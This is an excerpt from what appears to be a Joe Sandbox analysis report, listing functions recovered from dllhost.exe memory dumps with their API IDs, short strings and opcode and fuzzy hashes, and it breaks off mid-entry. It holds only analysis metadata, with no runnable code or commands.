                                            • Instruction ID: c2647e53bafcc3c520f4da39f1fa9dd3b64026680bba084455ba5b0f11c15cd8
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 87113D36705740D3EB248F21E40965AE7B0FB48B81F040026DE4D43BA5EFBDCA64C794
                                            Function 0000020175EE8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 56915b48f24458e82a99a47138cc162032089258724d0b34395af53a10b340e9
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 3B51E2323297808AFB54CB15E44CB6CF795F358B98F158121DA4A477AADFB8CA61D700
                                            Function 0000020175EB8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: ed0ed71d99fc2e61bd7c1d0439e1bc7986960b626d9f5a6fcee59e3c3da8eb78
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 3551E1323197008AFB54CB15E84CF6CF795F354B89F148129EA4A477AADFB9CA61C710
                                            Function 0000020175E89EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: a198b85ebc29dcc21cad61a09253dfcba2e215b7d950622c21f4c3a8916cd14e
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 795190326847848AEB788F21D548368F7A0F354BA4F146115DA9987BE7CFB8F671CB01
                                            Function 0000020175EEA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: f11ed8a5f89a24eb058d57883c88611e13664656c68c2db0a0e33ccb11f7d3d0
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 8A619F72514BC485EB209F15F44879EF7A0F789B94F044219EB9857BAADFBCC2A0CB00
                                            Function 0000020175EEAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 10287cf0550df9d29c0159fa5d85fb6cebf089bf33155172e6a5c0cc25d14994
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: FA516F322207808BFB748F25954C358F7A1F758B98F18411ADA9997BE6CFB8D670E701
                                            Function 0000020175EBA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 6f0942c97e7f1647706bddf2adfe751033534ba92b68f8f68c1d03ed379b97e5
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: BB619D72508BC485EB719F15E444B9EF7A0F785B99F044215EB9853BAADFB8C2A0CB10
                                            Function 0000020175EBAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: f472994e0d258fc97a4479fc5cc62aeff46c6227a1ca346b31bfa673c04cf05d
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: E351A2322007808BEF768F21D588B58FBA1F354B96F184116DA9947BE6CFB8C670CB11
                                            Function 0000020175EE3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: d4569bfa2a1fcdb23e673d1b62a35a7239fdccd40947b7e51e8d84354c9e5b57
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 9A11842132478192FB509B25E80935EE2A4F75CB80F9444259E4DC36EAEFB8DBA5D740
                                            Function 0000020175EB3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: 8c89f960654431d9c0d7db2a3392d5579378b30a6b0fcbda03d635bf19327b93
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 9B11967131078192FB109B25E81975AE3A4F748781F944025DE5983ABAEFB8CA65C750
                                            Function 0000020175EF1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 35d9c757ed0fe4513585bd4e539eadf52fd093e81546cb255a272ad5f18cd3aa
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 31D1CB32714B8489E751CFA5D84829CB7B1F354B98F404216CE5EA7BEADFB5C226C740
                                            Function 0000020175EC1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: e4d6be7033bb7708a749e4efd585d9d184a50702dd6aba70de56a6a075ca9b59
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 5ED1FF32714B848AE710CFA9D4486DCB7B1F354B98F404216DE9EA7BAADF75C626C340
                                            Function 000000014000148C Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                            • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                                            • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                            • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                                            Function 0000020175EE14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 542879774d4b37c2c4f6158ed6293d434182db9028bc110ba96dcc62d4610a63
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 6C012932610F90DAE754DF66E808149FBA1F79CF81B094026DF4953769EF74E6A1C740
                                            Function 0000020175EB14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: 99e6de93c42aa89ec951b0637f104e7ca98908024865756e2a0519541f22cf4a
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 9001E532610F90DAE718DF66E808669F7A1F788F81F0A4026DF4953729EF78D6A1C740
                                            Function 0000020175EF28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000020175EF28DF), ref: 0000020175EF2A12
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 2943d4b894f46439057ee3381a6a045c2eaac7cdd1918a51021215eadbf17b98
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: DA91F332B10B5489FBA0CF659C583ADFBA1F354B88F444106DE4A57AE6DFB6C666C300
                                            Function 0000020175EC28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000020175EC28DF), ref: 0000020175EC2A12
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 26772c4d82cf41c12228213bcd18c72309a7f25052ca1e140cd0dcfae6c9c3fd
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 29914432B1075089FB60CF7594587ADFBA1F344B88F444106DE8A67BA6DFB6C6A6C300
                                            Function 0000020175EE8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 7ed6f03d52861d04c310d88f82d51a1832d1823d58d146f039ccb8b505fb4643
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 7F110C26711F048AFB40CF60E8593A9B3A4F759758F441E25DA6D877A5EFB8C264C340
                                            Function 0000020175EB8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: 32dcd197e1c764250b7da0992c6fa0927721785564f3d360bd14f6da7c4201f8
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 20115E26711F048AEB00CF64E8593A8B3B4F719768F441E25DA6D867B5EFB8C2A4C340
                                            Function 0000020175EE27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: a4586d7c92c90f226e636855f1f3be765008ca7c422b7c4e292e15bf223d306c
